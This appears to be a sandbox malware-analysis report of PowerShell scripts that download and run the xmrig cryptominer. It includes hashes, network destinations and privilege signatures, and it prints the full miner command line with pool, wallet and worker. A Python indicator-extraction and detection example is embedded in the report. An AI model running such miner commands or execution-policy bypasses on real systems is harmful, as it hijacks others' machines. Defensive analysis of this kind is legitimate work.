GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

memory/4676-0-0x00007FFFC2E03000-0x00007FFFC2E04000-memory.dmp

memory/4676-5-0x000001A7C9320000-0x000001A7C9342000-memory.dmp

memory/4676-7-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-10-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-11-0x000001A7C9FF0000-0x000001A7CA066000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pxl0hafg.kma.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4676-26-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-49-0x000001A7C94E0000-0x000001A7C94F2000-memory.dmp

memory/4676-62-0x000001A7C94C0000-0x000001A7C94CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1204-91-0x00000231D86E0000-0x00000231D8700000-memory.dmp

memory/1204-92-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-93-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/4676-95-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-94-0x00007FFFC2E03000-0x00007FFFC2E04000-memory.dmp

memory/4676-96-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-97-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/1204-98-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-99-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-100-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-101-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-102-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-103-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-104-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-105-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-106-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-107-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-108-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-109-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-110-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-111-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-112-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-113-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-114-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-115-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-116-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-117-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-118-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-119-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-120-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-121-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-122-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-123-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-124-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-125-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-126-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-127-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-128-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-129-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-130-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-131-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-132-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-133-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-134-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-135-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-136-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-137-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-138-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-139-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-140-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-141-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-142-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-143-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-144-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-145-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-146-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-147-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-148-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-149-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-150-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-151-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-152-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-153-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-154-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-155-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-156-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-157-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

memory/1204-158-0x00007FF6C5220000-0x00007FF6C5E53000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:11

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1778s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4704-0-0x00007FFB141D3000-0x00007FFB141D4000-memory.dmp

memory/4704-5-0x000002ADC4210000-0x000002ADC4232000-memory.dmp

memory/4704-8-0x00007FFB141D0000-0x00007FFB14BBC000-memory.dmp

memory/4704-9-0x000002ADC4340000-0x000002ADC43B6000-memory.dmp

memory/4704-10-0x00007FFB141D0000-0x00007FFB14BBC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sbighjrj.uz2.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4704-25-0x00007FFB141D0000-0x00007FFB14BBC000-memory.dmp

memory/4704-48-0x000002ADC4190000-0x000002ADC41A2000-memory.dmp

memory/4704-61-0x000002ADC4180000-0x000002ADC418A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1560-90-0x000001996BCE0000-0x000001996BD00000-memory.dmp

memory/1560-91-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-92-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/4704-93-0x00007FFB141D3000-0x00007FFB141D4000-memory.dmp

memory/4704-94-0x00007FFB141D0000-0x00007FFB14BBC000-memory.dmp

memory/4704-95-0x00007FFB141D0000-0x00007FFB14BBC000-memory.dmp

memory/1560-96-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-97-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-98-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-99-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-100-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-101-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-102-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-103-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-104-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-105-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-106-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-107-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-108-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-109-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-110-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-111-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-112-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-113-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-114-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-115-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-116-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-117-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-118-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-119-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-120-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-121-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-122-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-123-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-124-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-125-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-126-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-127-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-128-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-129-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-130-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-131-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-132-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-133-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-134-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-135-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-136-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-137-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-138-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-139-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-140-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-141-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-142-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-143-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-144-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-145-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-146-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-147-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-148-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-149-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-150-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-151-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-152-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-153-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-154-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-155-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

memory/1560-156-0x00007FF76EDC0000-0x00007FF76F9F3000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:17

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 84.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp
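
The xmrig command line recorded in the Processes list of this analysis carries every indicator a hunter needs (pool, wallet, worker name, algorithm), so it is worth pulling apart mechanically. The block below is an added example, not code from the sandbox or from the xmrig project: it tokenises the command line as copied from this page and extracts those fields. The flag meanings (-a algorithm, -o pool URL, -u user, -p password) are taken from how they appear above; the unmineable "COIN:wallet.worker" user convention, the Monero address shape used as a plausibility check, and the heuristic in is_suspected_miner are assumptions made for the example.

```python
"""Added example (not part of the report): extract miner IoCs from the
xmrig command line recorded in the behavioral30 Processes list."""
import re
from urllib.parse import urlsplit

# Copied verbatim from the behavioral30 process list on this page.
XMRIG_CMDLINE = (
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\xmrig-6.21.3\\xmrig.exe" -a rx '
    '-o stratum+ssl://rx.unmineable.com:443 '
    '-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF'
    '.unmineable_worker_vilqtiac -p x'
)

# Short and long spellings of the xmrig flags seen here (assumed mapping).
FLAGS = {
    "-a": "algo", "--algo": "algo",
    "-o": "pool", "--url": "pool",
    "-u": "user", "--user": "user",
    "-p": "password", "--pass": "password",
}

# Monero primary address: 95 base58 characters starting with '4'
# (assumption used only as a plausibility check; base58 omits 0, O, I, l).
XMR_ADDRESS = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")


def split_cmdline(cmdline: str) -> list:
    """Tokenise a Windows command line: quoted spans stay whole, backslashes are literal."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_xmrig_cmdline(cmdline: str) -> dict:
    """Return image, algorithm, pool, wallet and worker from an xmrig-style command line."""
    tokens = split_cmdline(cmdline)
    if not tokens:
        return {}
    ioc = {"image": tokens[0], "algo": None, "pool": None, "user": None, "password": None}
    i = 1
    while i < len(tokens):
        tok, val = tokens[i], None
        i += 1
        if tok.startswith("--") and "=" in tok:          # --url=stratum://...
            tok, val = tok.split("=", 1)
        elif i < len(tokens) and not tokens[i].startswith("-"):
            val = tokens[i]                               # value is the next token
            i += 1
        if tok in FLAGS and val is not None:              # boolean flags fall through
            ioc[FLAGS[tok]] = val

    if ioc["pool"]:
        url = urlsplit(ioc["pool"])                       # custom schemes still get a netloc
        ioc["pool_scheme"] = url.scheme
        ioc["pool_host"] = url.hostname
        ioc["pool_port"] = url.port
        ioc["pool_tls"] = url.scheme.endswith(("ssl", "tls"))

    if ioc["user"]:
        # unmineable convention (assumed): COIN:wallet.worker
        coin, _, rest = ioc["user"].partition(":")
        wallet, _, worker = rest.partition(".")
        ioc.update(coin=coin, wallet=wallet, worker=worker or None)
        ioc["wallet_is_xmr_shaped"] = bool(XMR_ADDRESS.match(wallet))
    return ioc


def is_suspected_miner(cmdline: str) -> bool:
    """Heuristic: a stratum pool URL or a CPU-mining algorithm flag on the command line."""
    ioc = parse_xmrig_cmdline(cmdline)
    pool = (ioc.get("pool") or "").lower()
    algo = (ioc.get("algo") or "").lower()
    return pool.startswith("stratum") or algo in {"rx", "rx/0", "randomx", "cn"}


if __name__ == "__main__":
    for key, value in parse_xmrig_cmdline(XMRIG_CMDLINE).items():
        print(f"{key:20} {value}")
```

The wallet is the durable indicator: the binary hash, the drop path and the worker name change between builds, but the payout address is what ties separate detonations to one operator. The SeLockMemoryPrivilege requests listed under Signatures are consistent with the -a rx flag, since xmrig asks for that privilege to allocate large pages for RandomX.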

Files

memory/824-0-0x00007FFC92233000-0x00007FFC92234000-memory.dmp

memory/824-5-0x00000224AEB00000-0x00000224AEB22000-memory.dmp

memory/824-9-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

memory/824-10-0x00000224AF5F0000-0x00000224AF666000-memory.dmp

memory/824-11-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rteevrbk.lhl.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/824-26-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

memory/824-49-0x00000224AF5C0000-0x00000224AF5D2000-memory.dmp

memory/824-62-0x00000224AF5A0000-0x00000224AF5AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4208-91-0x000001E0E3850000-0x000001E0E3870000-memory.dmp

memory/4208-92-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/824-94-0x00007FFC92233000-0x00007FFC92234000-memory.dmp

memory/824-95-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

memory/4208-93-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/824-96-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

memory/824-97-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmp

memory/4208-98-0x00007FF6D5220000-0x00007FF6D5E53000-memory.dmp

memory/4208-99 through memory/4208-158: 60 further dumps of the same region, 0x00007FF6D5220000-0x00007FF6D5E53000

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:11

Platform

win7-20240221-en

Max time kernel

1563s

Max time network

1568s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

